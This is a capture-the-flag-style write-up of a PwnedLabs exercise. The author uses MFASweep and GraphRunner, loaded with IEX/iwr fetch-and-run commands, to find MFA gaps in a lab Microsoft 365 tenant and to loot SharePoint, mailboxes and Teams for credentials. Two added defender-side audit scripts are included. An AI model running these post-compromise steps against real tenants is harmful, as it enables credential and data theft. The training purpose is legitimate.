4. Loot Exchange, Teams and SharePoint with GraphRunner
This write-up is based on PwnedLabs.io’s free module, Loot Exchange, Teams and SharePoint with GraphRunner, which offers top-notch content at an unbeatable price. While I’m not affiliated with PwnedLabs.io, I highly recommend their resources. Learn more about their subscription options at PwnedLabs.io/pricing.
Start with Credentials
#### Azure credentials
##### Password: *****
##### IAM User: Clara.Miller@megabigtech.com
Key Takeaways
- Identify MFA-enabled and disabled services!
1. MFA Sweeps
Download MFA Sweeps:
IEX (iwr 'https://raw.githubusercontent.com/dafthack/MFASweep/master/MFASweep.ps1')
Invoke-MFASweep -Username Clara.Miller@megabigtech.com -Password ***** -Recon -IncludeADFS
It will output a lot of data. The last table summarizes the results well.
The second thing I noticed was a sentence in blue:
ADFS does not appear to be in use. Authentication appears to be managed by Microsoft.
1.1 What is ADFS and What Does This Mean?
Active Directory Federation Services (ADFS) is a tool that helps connect a company's local network (on-premises) to cloud services. It allows employees to use their regular work login to access both on-premises apps and cloud apps without needing a separate cloud password. It is similar to a single sign-on service. More information can be found here: ../Azure Services/Active Directory Federation Services (ADFS).
This made me curious about other authentication methods.
../Azure General/IAM/How does a user authenticate to the cloud?
Hence, ADFS does not appear to be in use. Authentication appears to be managed by Microsoft.
It seems the authentication is solely handled by Microsoft's cloud identity service, possibly Entra ID.
1.2 What is Microsoft Graph API?
../Azure Services/Microsoft Graph
Simply put, Microsoft Graph is a gateway to Microsoft cloud services, and Graph API is how we, as users, can access Microsoft Graph.
1.3 What is Microsoft API Management?
https://learn.microsoft.com/en-us/azure/api-management/api-management-key-concepts
../Azure Services/Azure API Management
Azure API Management is a way to manage various APIs.
Azure API Management is a hybrid, multicloud management platform for APIs across all environments. As a platform-as-a-service, API Management supports the complete API lifecycle.
2. Walkthrough
- Get credentials.
- Check MFA-enabled/disabled services using MFA Sweeps. #1. MFA Sweeps
- Log in and retrieve assigned Microsoft 365 licenses. ../Azure Services/Microsoft Graph
PS> Connect-MgGraph
PS> Get-MgUserLicenseDetail -UserId "Clara.Miller@megabigtech.com"

Id                                          SkuId                                SkuPartNumber
--                                          -----                                -------------
78yQJX1oO0mujUQcurY6chhRVTtq2hhEiU998eIJaHA 3b555118-da6a-4418-894f-7df1e2096870 O365_BUSINESS_ESSENTIALS
Ironically, I no longer see the Business Essentials plan listed among Microsoft business plans.
- Enumerate Graph API. ../Azure Services/Microsoft Graph
Knowing that the user account has an assigned Microsoft 365 license and access to Graph API and API Management services, we can enumerate further.
IEX (iwr 'https://raw.githubusercontent.com/dafthack/GraphRunner/main/GraphRunner.ps1')
According to Black Hills, GraphRunner is a post-exploitation tool used to gather information about the Graph API. Video.
We built a post-compromise toolset called GraphRunner for interacting with the Microsoft Graph API.
GraphRunner tool information can be found here: ../Azure Services/Microsoft Graph#4.2 Complete Workflow of System Information Gaining.
2.1 Start Authentication with GraphRunner
After logging in, the first step is to authenticate with the system. ../Azure Services/Microsoft Graph#4.2.1 Authentication Flow.
The Get-GraphTokens command was really simple. All I had to do was log in with the given device code and enter Clara's credentials. Once the authentication process was complete, the tokens were saved in the $tokens variable.
PS> Get-GraphTokens
[*] It looks like you already have tokens set in your $tokens variable. Are you sure you want to authenticate again?
y
[*] Initiating device code login...
To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code AGVQ7MD48 to authenticate.
However, Get-AzureAppTokens requires a bit more information.
PS> Get-AzureAppTokens
cmdlet Get-AzureAppTokens at command pipeline position 1
Supply values for the following parameters:
Scope:
ClientID:
ClientSecret:
RedirectUri:
AuthCode:
Get-AzureAppTokens: Cannot bind argument to parameter 'Scope' because it is an empty string.
2.2 Recon and Enumeration
Once I had the user's login information, instead of following the walkthrough, I decided to have a little more fun.
Let's use the ../Azure Services/Microsoft Graph#4.2.2 Recon & Enumeration Flow.
2.2.1 Invoke-GraphRecon
PS> Invoke-GraphRecon -Tokens $tokens
[*] Using the provided access tokens.
[*] Refreshing token to the Azure AD Graph API...
[*] Now trying to query the MS provisioning API for organization settings.
================================================================================
Main Contact Info
================================================================================
Display Name: Default Directory
Street: 165 The Broadway
City: London
State:
Postal Code: SW19 1NE
Country: GB
Technical Notification Email: ian@cloudpwned.com
Telephone Number:
================================================================================
Directory Sync Settings
================================================================================
Initial Domain: iancloudpwned.onmicrosoft.com
Directory Sync Enabled: true
Directory Sync Status: Enabled
Directory Sync Client Machine: DCNY02
Directory Sync Service Account: Sync_DCNY02_8668877016c3@iancloudpwned.onmicrosoft.com
Password Sync Enabled: true
================================================================================
User Settings
================================================================================
Self-Service Password Reset Enabled: true
Users Can Consent to Apps: true
Users Can Read Other Users: true
Users Can Create Apps: false
Users Can Create Groups: false
================================================================================
Additional Service Parameters
================================================================================
RootAdminUrl : https://iancloudpwned-admin.sharepoint.com/
RootIWSPOUrl : https://iancloudpwned-my.sharepoint.com/
SPO_RootSiteUrl : https://iancloudpwned.sharepoint.com/
SPO_TenantUpgradeUrl : https://iancloudpwned-admin.sharepoint.com/
SPO_TenantAdminUrl : https://iancloudpwned-admin.sharepoint.com/
SPO_TenantAdmin_CreateSiteCollectionUrl : https://iancloudpwned-admin.sharepoint.com/_layouts/15/online/CreateSiteFull.aspx
SPO_TenantAdmin_ViewSiteCollectionsUrl : https://iancloudpwned-admin.sharepoint.com/
SPO_TenantAdmin_ProjectAdminUrl : https://iancloudpwned-admin.sharepoint.com/
SPO_MySiteHostUrl : https://iancloudpwned-my.sharepoint.com/
SPO_MySiteHost_NewsFeedUrl : https://iancloudpwned-my.sharepoint.com/default.aspx
SPO_MySiteHost_DocumentsUrl : https://iancloudpwned-my.sharepoint.com/_layouts/15/MySite.aspx?MySiteRedirect=AllDocuments
SPO_MySiteHost_SitesUrl : https://iancloudpwned-my.sharepoint.com/_layouts/15/MySite.aspx?MySiteRedirect=AllSites
SPO_MySiteHost_AboutMeUrl : https://iancloudpwned-my.sharepoint.com/person.aspx
SPO_MySiteHost_ProjectSiteUrl : https://iancloudpwned-my.sharepoint.com/_layouts/15/MyProjects.aspx
SPO_PublicWebSiteUrl : NotSupported
SPO_PublicWebSitePublicUrl :
SPO_LegacyPublicWebSiteUrl :
SPO_LegacyPublicWebSiteEditPage : Pages/Forms/AllItems.aspx
SPO_LegacyPublicWebSitePublicUrl :
OfficeGraphUrl : https://iancloudpwned-my.sharepoint.com/_layouts/15/me.aspx
SPO_RegionalRootSiteUrl : https://iancloudpwned.sharepoint.com/
StreamLaunchConfig : 21
ShowSkyDrivePro_InitialVisibility : True
ShowYammerNewsFeed_InitialVisibility : True
ShowSites_InitialVisibility : True
ServiceInformation_LastChangeDate : 9/11/2024 5:39:21 AM
InstanceId : 7dff6839-e224-45de-b8cd-042646389e73
EnableOneDriveforSuiteUsers : False
YammerEnterprise_AdminUrl : https://www.yammer.com/iancloudpwned.onmicrosoft.com/admin
================================================================================
Authorization Policy Info
================================================================================
Allowed to create app registrations (Default User Role Permissions): False
Allowed to create security groups (Default User Role Permissions): False
Allowed to create tenants (Default User Role Permissions): False
Allowed to read Bitlocker keys for own device (Default User Role Permissions): True
Allowed to read other users (Default User Role Permissions): True
Who can invite external users to the organization: adminsAndGuestInviters
Users can sign up for email-based subscriptions: True
Users can use Self-Serve Password Reset: True
Users can join the tenant by email validation: False
Users can consent to risky apps: False
Block MSOL PowerShell: False
Guest User Role Template ID: 10dae51f-b6af-4016-8d66-8c2a99b929b3
Guest User Policy: Guest users have limited access to properties and memberships of directory objects
From the above information, I attempted to log in to the SharePoint website. However, MFA authentication was enabled.
2.2.2 Invoke-DumpCAPS
Under the Clara Miller section, I found something interesting: Excluded Applications: 14d82eec-204b-4c2f-b7e8-296a70dab67e, 797f4846-ba00-4fd7-ba43-dac1f8f63013. I was not able to log in to the Azure Portal with Clara's credentials, but Google helped me.
https://practical365.com/secure-internet-access-microsoft-graph-powershell-sdk/
It seems that 797f4846-ba00-4fd7-ba43-dac1f8f63013 is generally Azure API Management, and 14d82eec-204b-4c2f-b7e8-296a70dab67e is the SDK app. ../Azure Services/SDKs
PS> Invoke-DumpCAPS -Tokens $tokens
================================================================================
Display Name: Require MFA for Clara Miller
Policy Type: 18
Policy State: Enabled
Conditions:
Applications:
Include:
Applications: All
Exclude:
Applications: 14d82eec-204b-4c2f-b7e8-296a70dab67e, 797f4846-ba00-4fd7-ba43-dac1f8f63013
Users:
Include:
Users: 36fa333d-1720-4920-8a5c-2b9b696c6adf
ClientTypes:
Include:
ClientTypes: Browser, EasSupported, EasUnsupported, OtherLegacy, LegacySmtp, LegacyPop, LegacyImap, LegacyMapi, LegacyOffice
Controls: MFA
Earlier in #1. MFA Sweeps, Graph API and API management were the ones where MFA was not enabled.
For now, I will just move on to the next step.
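As an added, defender-side example (not part of this write-up or of GraphRunner), the script below uses the Microsoft Graph PowerShell SDK to list every Conditional Access policy that carries application exclusions, so a gap like the two excluded app IDs above shows up in a routine review instead of in an attacker's Invoke-DumpCAPS output. It assumes the Microsoft.Graph module is installed and that the signed-in account can be granted Policy.Read.All and Application.Read.All; app display names are resolved from the tenant's service principals rather than hard-coded.

```powershell
# Added example (not from the write-up or GraphRunner): audit Conditional Access
# policies for application exclusions with the Microsoft Graph PowerShell SDK.
# Assumes the Microsoft.Graph module is installed and the caller can be granted
# Policy.Read.All (policies) and Application.Read.All (service principal lookup).
Connect-MgGraph -Scopes "Policy.Read.All", "Application.Read.All" -NoWelcome

# Cache app-ID -> display-name lookups; first-party Microsoft apps may have no
# service principal object in the tenant, in which case we report "(unknown app)".
$nameCache = @{}
function Resolve-AppName {
    param([string]$AppId)
    if (-not $nameCache.ContainsKey($AppId)) {
        $sp = Get-MgServicePrincipal -Filter "appId eq '$AppId'" -ErrorAction SilentlyContinue
        $nameCache[$AppId] = if ($sp) { $sp.DisplayName } else { "(unknown app)" }
    }
    return $nameCache[$AppId]
}

$findings = foreach ($policy in Get-MgIdentityConditionalAccessPolicy -All) {
    $apps     = $policy.Conditions.Applications
    $excluded = @($apps.ExcludeApplications)
    # The pattern seen in this lab: the policy includes "All" applications but
    # excludes a few, so the grant control (MFA) is not enforced for those apps.
    if ($excluded.Count -gt 0) {
        [pscustomobject]@{
            Policy       = $policy.DisplayName
            State        = $policy.State
            Controls     = ($policy.GrantControls.BuiltInControls -join ", ")
            IncludedApps = ($apps.IncludeApplications -join ", ")
            ExcludedApps = (($excluded | ForEach-Object { "$_ ($(Resolve-AppName $_))" }) -join "; ")
        }
    }
}

if ($findings) { $findings | Format-List } else { "No Conditional Access policies with application exclusions." }
```

Any policy reported here is worth a second look: each excluded app ID is a client through which the policy's controls do not apply to the included users, and the exclusion should either be documented with a compensating control or removed.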
2.2.3 Invoke-DumpApps
This command spits out a good chunk of data. Some results were worth noting.
One key point was that 14d82eec-204b-4c2f-b7e8-296a70dab67e had previously been identified with the Invoke-DumpCAPS command (#2.2.2 Invoke-DumpCAPS).
According to Invoke-DumpApps, 14d82eec-204b-4c2f-b7e8-296a70dab67e is an external app, Microsoft Graph Command Line Tools.
PS> Invoke-DumpApps -Tokens $tokens
================================================================================
App Name: megabigtech-dev (App ID: 378ac9d7-056c-49d7-8ea0-e86250e1fb9a)
Creation Date: 12/18/2023 21:03:27
Sign-In Audience: AzureADMyOrg
Consented User: Ian Austin (User ID: 18600f1a-3cee-434e-860f-aff4078da055)
Consented User: Budi Setiawan (User ID: f851f8c9-1105-4f57-aa77-d4c440dfb16a)
Consented User: Annette Palmer (User ID: 9861fd14-539c-4f98-becf-ce2c9eac3c99)
Delegated Permissions (Scopes): User.Read
...snip...
External App: PowerShell.MSGraph
AppId: 5e79add2-6288-4d91-bebc-cae920227404
Object ID: c25378ab-f923-49d2-8616-7119f4eecc57
appOwnerOrganizationId: 9188040d-6c67-4c5b-b112-36a304b66dad
Creation Date: 05/31/2024 19:05:55
Scope of Consent:
offline_access, Delegated, Clara.Miller@megabigtech.com
openid, Delegated, Clara.Miller@megabigtech.com
External App: Graph Explorer
AppId: de8bc8b5-d9f9-48b1-a8ad-b748da725064
Object ID: 881df9b0-62d7-4dfc-8bfa-3f358bf7cd9b
appOwnerOrganizationId: 72f988bf-86f1-41af-91ab-2d7cd011db47
Creation Date: 12/07/2023 14:04:22
Scope of Consent:
Invoke-RestMethod:
Line |
3531 | … serobject = Invoke-RestMethod -uri "$($graphApiUrl)/users/$userorgrou …
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| {"error":{"code":"TooManyRequests","message":"Too many requests from Identifier:d3590ed6-52b3-4102-aeff-aad2292ab01c under category:aadgraph.app. Please try again later.","innerError":{"date":"2024-09-12T14:19:55"}}}
Invoke-RestMethod:
External App: Microsoft Graph Command Line Tools
AppId: 14d82eec-204b-4c2f-b7e8-296a70dab67e
Object ID: 7176f94c-6797-4cea-b5a6-172aeddf7d14
appOwnerOrganizationId: 72f988bf-86f1-41af-91ab-2d7cd011db47
Creation Date: 10/12/2023 17:11:27
Scope of Consent:
At one point, I was getting a Too many requests... error.
Invoke-RestMethod:
Line |
3531 | … serobject = Invoke-RestMethod -uri "$($graphApiUrl)/users/$userorgrou …
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| {"error":{"code":"TooManyRequests","message":"Too many requests from Identifier:d3590ed6-52b3-4102-aeff-aad2292ab01c under category:aadgraph.app. Please try again later.","innerError":{"date":"2024-09-12T14:19:28"}}}
user_impersonation, Delegated,
Invoke-RestMethod:
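Added example, not from the write-up or from GraphRunner: the consent picture that Invoke-DumpApps reconstructs from the user's side can be reviewed from the admin side with the Microsoft Graph PowerShell SDK. The script reports the tenant's user-consent setting (the "Users Can Consent to Apps" value in the recon output) and lists delegated permission grants to applications owned by another tenant, which is what the "External App" entries above are. It assumes the Microsoft.Graph module is installed and that Policy.Read.All and Directory.Read.All can be granted; the regular expression used to flag broad scopes is my own choice, not a Microsoft-defined list.

```powershell
# Added example (not from the write-up or GraphRunner): review user consent
# settings and delegated grants to external applications. Assumes the
# Microsoft.Graph module and the Policy.Read.All / Directory.Read.All scopes.
Connect-MgGraph -Scopes "Policy.Read.All", "Directory.Read.All" -NoWelcome

# 1. Tenant-wide setting behind "Users Can Consent to Apps" in the recon output.
#    An empty list means users cannot consent to applications at all.
$authz = Get-MgPolicyAuthorizationPolicy
"User consent policies assigned: " +
    ($authz.DefaultUserRolePermissions.PermissionGrantPoliciesAssigned -join ", ")

# 2. Resolve each grant's client service principal once; keep only clients whose
#    owning tenant is not ours (external apps such as Graph Command Line Tools).
$org     = (Get-MgOrganization).Id
$spCache = @{}
function Get-ClientSp([string]$Id) {
    if (-not $spCache.ContainsKey($Id)) {
        $spCache[$Id] = Get-MgServicePrincipal -ServicePrincipalId $Id -ErrorAction SilentlyContinue
    }
    return $spCache[$Id]
}

$grants = foreach ($g in Get-MgOauth2PermissionGrant -All) {
    $sp = Get-ClientSp $g.ClientId
    if (-not $sp -or $sp.AppOwnerOrganizationId -eq $org) { continue }
    # ConsentType "Principal" = one user consented for themselves;
    # "AllPrincipals" = an admin consented on behalf of every user.
    $who = if ($g.ConsentType -eq 'Principal') {
        $u = Get-MgUser -UserId $g.PrincipalId -Property userPrincipalName -ErrorAction SilentlyContinue
        if ($u) { $u.UserPrincipalName } else { $g.PrincipalId }
    } else { '(all users, admin consent)' }
    [pscustomobject]@{
        App     = $sp.DisplayName
        AppId   = $sp.AppId
        Consent = $g.ConsentType
        User    = $who
        Scopes  = "$($g.Scope)".Trim()
    }
}

$grants | Sort-Object App, User | Format-Table -AutoSize

# 3. Flag write-capable or directory-wide delegated scopes for review (my own pattern).
$broad = 'ReadWrite|\.All|Mail\.Send|Files\.Read'
"`nGrants carrying broad scopes:"
$grants | Where-Object { $_.Scopes -match $broad } | Format-Table App, User, Scopes -AutoSize
```

The second table is the one to act on: a grant such as Files.Read.All or Mail.ReadWrite given by a single user to a multi-tenant app means that app can reach the same SharePoint, OneDrive and mailbox content that GraphRunner reaches later in this write-up, with that user's token.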
2.2.4 Get-AzureADUsers
This command spits out all Azure AD users.
PS> Get-AzureADUsers -Tokens $tokens
cmdlet Get-AzureADUsers at command pipeline position 1
Supply values for the following parameters:
outfile: test.txt
[*] Gathering the users from the tenant.
---All Azure AD User Principal Names---
Akari.Fukimo@megabigtech.com
Akira.Suzuki@megabigtech.com
alee@megabigtech.com
Alexandra.Wu@megabigtech.com
Alice.Garcia@megabigtech.com
ian_cloudpwned.com#EXT#@iancloudpwned.onmicrosoft.com
...snip...
security-user@megabigtech.com
Seline.Diaz@megabigtech.com
serene@megabigtech.com
serveruser@megabigtech.com
stan.lee@megabigtech.com
Sunita.Williams@megabigtech.com
sunita_adm@megabigtech.com
Sync_DCNY02_8668877016c3@iancloudpwned.onmicrosoft.com
tim.cooke@megabigtech.com
truls@megabigtech.com
William.Martinez@megabigtech.com
William.Smith@megabigtech.com
yuki.tanaka@megabigtech.com
Yumi.Nakamura@megabigtech.com
Discovered 71 users
2.2.5 Get-SecurityGroups
No luck with Get-SecurityGroups.
PS> Get-SecurityGroups -Tokens $tokens
[*] Using the provided access tokens.
[*] Retrieving a list of security groups and their members from the directory...
[*] An error occurred while retrieving security groups: Response status code does not indicate success: 429 ().
2.2.6 Get-SharePointSiteURLs
The result of Get-SharePointSiteURLs displays the SharePoint site URLs. Clara's account requires MFA. However, I was able to take a look at the site with the Security-user credentials.
With that, we got more credentials. Yeah. However, this is not the intended way for this lab.
PS> Get-SharePointSiteURLs -Tokens $tokens
[*] Using the provided access tokens.
[*] Now getting SharePoint site URLs...
[*] Found a total of 14 site URLs.
Web URL: https://iancloudpwned.sharepoint.com/FormServerTemplates/Forms/All Forms.aspx
Web URL: https://iancloudpwned.sharepoint.com/Shared Documents/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/allcompany/FormServerTemplates/Forms/All Forms.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/allcompany/Shared Documents/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/allcompany/Style Library/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/DefaultDirectory/FormServerTemplates/Forms/All Forms.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/DefaultDirectory/Shared Documents/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/DefaultDirectory/SiteAssets/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/DefaultDirectory/Style Library/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/FinanceTeam/FormServerTemplates/Forms/All Forms.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/FinanceTeam/Shared Documents/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/FinanceTeam/SiteAssets/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/FinanceTeam/Style Library/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/Style Library/Forms/AllItems.aspx
2.2.7 Invoke-GraphOpenInboxFinder
We confirmed that we can read Clara's mailbox. It makes total sense because we are using Clara's credentials.
PS> Invoke-GraphOpenInboxFinder -Tokens $tokens
cmdlet Invoke-GraphOpenInboxFinder at command pipeline position 1
Supply values for the following parameters:
userlist: ./test.txt
[*] Note: To read other user's mailboxes your token needs to be scoped to the Mail.Read.Shared or Mail.ReadWrite.Shared permissions.
[*] Checking access to mailboxes for each email address...
[*] SUCCESS! Inbox of Clara.Miller@megabigtech.com is readable.
Latest Email Received 11/06/2023 14:51:57 with subject: Quick Heads-Up on This Month's Recons!
70 of 71 mailboxes checked
2.3 Pillage Flow
2.3.1 Invoke-SearchSharePointAndOneDrive
Fortunately, this command supports the wildcard character and downloads the files. Since I am using pwsh from Linux, I tried to read those files with O365.
However, I got "You need permission to access this item." So it is interesting to me that Clara has the privilege to download, but I need her MFA device to use the GUI. With the Security-user credentials, I can view a limited set of files.
PS> Invoke-SearchSharePointAndOneDrive -searchTerm * -Tokens $tokens
[*] Using the provided access tokens.
[*] Found 14 matches for search term *
Result [0]
File Name: passwords.xlsx
Location: https://iancloudpwned.sharepoint.com/Shared Documents/passwords.xlsx
Created Date: 03/27/2024 00:13:10
Last Modified Date: 07/22/2024 08:20:00
Result [1]
File Name: Bonuses - Confidential.xlsx
Location: https://iancloudpwned-my.sharepoint.com/personal/sam_olsson_megabigtech_com/Documents/Bonuses - Confidential.xlsx
https://iancloudpwned.sharepoint.com/sites/FinanceTeam/Shared Documents/Finance Logins.docx
Result [3]
File Name: Finance Logins.docx
Location: https://iancloudpwned.sharepoint.com/sites/FinanceTeam/Shared Documents/Finance Logins.docx
...snip...
================================================================================
Result [4]
File Name: Document.docx
Location: https://iancloudpwned.sharepoint.com/sites/FinanceTeam/Shared Documents/Document.docx
...snip...
================================================================================
Result [5]
File Name: Default Directory Notebook
Location: https://iancloudpwned.sharepoint.com/sites/DefaultDirectory/SiteAssets/Default Directory Notebook
...snip...
================================================================================
Result [6]
File Name: __siteIcon__.jpg
Location: https://iancloudpwned.sharepoint.com/sites/DefaultDirectory/SiteAssets/Forms/DispForm.aspx?ID=2 ...snip...
================================================================================
...snip...
...snip...
It is such a pain to view an Excel file on Linux, hence I decided to cheat a little bit. I used the Security-User credentials to view the content.
2.3.2 Invoke-SearchMailbox
PS> Invoke-SearchMailbox -SearchTerm * -Tokens $tokens
[*] Using the provided access tokens.
[*] Found 98 matches for search term *
Subject: Subscribers database | Sender: /O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=EF775FA670FB409789970E587F6F4F04-36FA333D-17 | Receivers: Sam Olsson | Date: 11/06/2023 17:24:50 | Message Preview: Hi Sam, IT have set up our access to the subscriptions database, so we can start pulling on this data for the quarterly management metrics. Shared login below: Username: ...
================================================================================
Subject: RE: Quick Heads-Up on This Month's Recons! | Sender: /O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=EF775FA670FB409789970E587F6F4F04-36FA333D-17 | Receivers: Sam Olsson | Date: 11/06/2023 14:59:37 | Message Preview: Sounds good. Thanks! From: Sam Olsson <Sam.Olsson@megabigtech.com> Sent: Monday, November 6, 2023 2:52 PM To: Clara Miller <Clara.Miller@megabigtech.com> Subject: Quick Heads-Up on...
================================================================================
Subject: Quick Heads-Up on This Month's Recons! | Sender: Sam.Olsson@megabigtech.com | Receivers: Clara Miller | Date: 11/06/2023 14:51:56 | Message Preview: Hey Clara, Hope you're doing well! Just wanted to drop you a quick note about the reconciliations we've got lined up for the end-of-month close. Here's what's on the deck: Bank ...
================================================================================
[*] Do you want to download these emails and their attachments? (Yes/No)
yes
WARNING: Resulting JSON is truncated as serialization has exceeded the set depth of 2.
[*] Emails and attachments have been exported to the folder mailsearch-20240912115820.
[*] A simple emailviewer.html has been provided to view the exported emails.
[*] To use it run the Invoke-HTTPServer module in the mailsearch-20240912115820 directory and then navigate to http://localhost:8000/emailviewer.html
PS> Invoke-HTTPServer
Another cool feature is that I can download the emails and read them in a web browser.
2.3.3 Invoke-SearchTeams
Invoke-SearchTeams -SearchTerm * -Tokens $tokens
[*] Using the provided access tokens.
[*] Refreshing token for Teams use...
From: Clara.Miller@megabigtech.com | Summary: Call IT to reset my password for accounting system
Full Message Body: <html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body><p>Call IT to reset my password for accounting system</p></body></html>
================================================================================
From: Clara.Miller@megabigtech.com | Summary: password: *****
Full Message Body: <html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body><p>password: *****</p></body></html>
2.3.4 Get-TeamsChat
PS> Get-Teamschat -Tokens $tokens
[*] Using the provided access tokens.
[*] Now getting Teams chat conversations for current user.
Invoke-RestMethod:
Line |
2833 | … sResponse = Invoke-RestMethod -Uri "$graphBaseUrl$chatEndpoint" -Head …
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| {"error":{"code":"Forbidden","message":"Missing scope permissions on the request. API requires one of 'Chat.ReadBasic, Chat.Read, Chat.ReadWrite'. Scopes on the request 'AuditLog.Create, AuditLog.Read.All, Calendar.ReadWrite, Calendars.Read.Shared, Calendars.ReadWrite, Contacts.ReadWrite, DataLossPreventionPolicy.Evaluate, Directory.AccessAsUser.All, Directory.Read.All, Files.Read, Files.Read.All, Files.ReadWrite.All, Group.Read.All, Group.ReadWrite.All, InformationProtectionPolicy.Read, Mail.ReadWrite, Mail.Send, Notes.Create, Organization.Read.All, People.Read, People.Read.All, Printer.Read.All, PrinterShare.ReadBasic.All, PrintJob.ReadWriteBasic, SensitiveInfoType.Detect, SensitiveInfoType.Read.All, SensitivityLabel.Evaluate, Tasks.ReadWrite, TeamMember.ReadWrite.All, TeamsTab.ReadWriteForChat, User.Read.All, User.ReadBasic.All, User.ReadWrite, Users.Read'","innerError":{"date":"2024-09-12T18:59:37","request-id":"2353bfdc-e820-451a-91d5-a0bf65f61ad2","client-request-id":"2353bfdc-e820-451a-91d5-a0bf65f61ad2"}}}
No chats found for the authenticated user.
2.4 Continue with the Walkthrough
I used Google Docs to read the Word document.
If you don't love databases, you are not a tester!! However, it is not possible to access this just by looking at the URL.
Service/Account: Finance Database
URL: https://10.10.11.15/login
Username: finadmin
Password: *****
Service/Account: Accounting Software
URL: https://accounting.megabigtech.local
Username: accounting_user
Password: *****
Service/Account: Payroll System
URL: https://payrollonlinembt.corp.net
Username: payrollmanager
Password: *****
Service/Account: Bank Portal
URL: https://onlinebanking.megabank.com
Username: finusermbt
Password: *****
Service/Account: Expense Reporting
URL: https://expenses.megabigtech.local
Username: expensereport_user
Password: *****
I also managed to open the Bonuses file.
So earlier, in #2.3.2 Invoke-SearchMailbox, I used the Invoke-SearchMailbox command to view the mailbox, and I thought the wildcard character * was treated as "everything". Once I read the actual lab, I realized that was a mistake. So let's take a look at it.
PS> Invoke-SearchMailbox -Tokens $tokens -SearchTerm "Clara" -MessageCount 80
[*] Using the provided access tokens.
[*] Found 15 matches for search term Clara
Subject: Subscribers database | Sender: /O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=EF775FA670FB409789970E587F6F4F04-36FA333D-17 | Receivers: Sam Olsson | Date: 11/06/2023 17:24:50 | Message Preview: ...windows.net Database: Finance Clara ...
================================================================================
Subject: Quick Heads-Up on This Month's Recons! | Sender: Sam.Olsson@megabigtech.com | Receivers: Clara Miller | Date: 11/06/2023 14:51:56 | Message Preview: Hey Clara, Hope you're doing well! Just wanted to drop you a quick note about the reconciliations we've got lined up for the end-of-month close. Here's what's on the deck: Bank ...
================================================================================
Subject: Subscribers database | Sender: /O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=EF775FA670FB409789970E587F6F4F04-36FA333D-17 | Receivers: Sam Olsson | Date: 11/06/2023 17:24:50 | Message Preview: ...windows.net Database: Finance Clara ...
================================================================================
Subject: RE: Quick Heads-Up on This Month's Recons! | Sender: /O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=EF775FA670FB409789970E587F6F4F04-36FA333D-17 | Receivers: Sam Olsson | Date: 11/06/2023 14:59:37 | Message Preview: ...6, 2023 2:52 PM To: Clara Miller <Clara.Miller@megabigtech.com> Subject: Quick Heads-Up on This Month's Recons! Hey Clara, Hope you're doing well! Just wanted to drop you a quick ...
================================================================================
Subject: Quick Heads-Up on This Month's Recons! | Sender: Sam.Olsson@megabigtech.com | Receivers: Clara Miller | Date: 11/06/2023 14:51:56 | Message Preview: Hey Clara, Hope you're doing well! Just wanted to drop you a quick note about the reconciliations we've got lined up for the end-of-month close. Here's what's on the deck: Bank ...
================================================================================
[*] Do you want to download these emails and their attachments? (Yes/No)
PS> Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 40
[*] Using the provided access tokens.
[*] Found 5 matches for search term password
Subject: Subscribers database | Sender: /O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=EF775FA670FB409789970E587F6F4F04-36FA333D-17 | Receivers: Sam Olsson | Date: 11/06/2023 17:24:50 | Message Preview: ...login below: Username: financereports Password: $********** Server: mbt-finance.database.windows.net Database: Finance Clara ...
================================================================================
[*] Do you want to download these emails and their attachments? (Yes/No)
See the difference? I had missed the critical information.
It seems like some sort of database is involved. What do I know about the database here? Nothing. So let's dig a little bit. Knowing that this is an SQL database, we can use the database enumeration commands.
../Azure Services/Azure SQL#2.1 For database
So here is what we know.
Username: financereports
Password: ******
Server: mbt-finance.database.windows.net
Database: Finance
It turns out there is an SQL server I can connect to. The FQDN indicates the server name.
az sql server list
[
{
"administratorLogin": "manager",
...snip...
"fullyQualifiedDomainName": "mbt-finance.database.windows.net",
"id": "/subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94/resourceGroups/content-static-2/providers/Microsoft.Sql/servers/mbt-finance",
...snip...
"location": "eastus",
"minimalTlsVersion": "1.2",
"name": "mbt-finance",
...snip...
"resourceGroup": "content-static-2",
...snip...
"type": "Microsoft.Sql/servers",
"version": "12.0",
...snip...
}
]
We got the same information. I guess this command will only pull the specific server.
PS> az sql server show --resource-group "content-static-2" --name "mbt-finance"
{
"administratorLogin": "manager",
...snip...
"fullyQualifiedDomainName": "mbt-finance.database.windows.net",
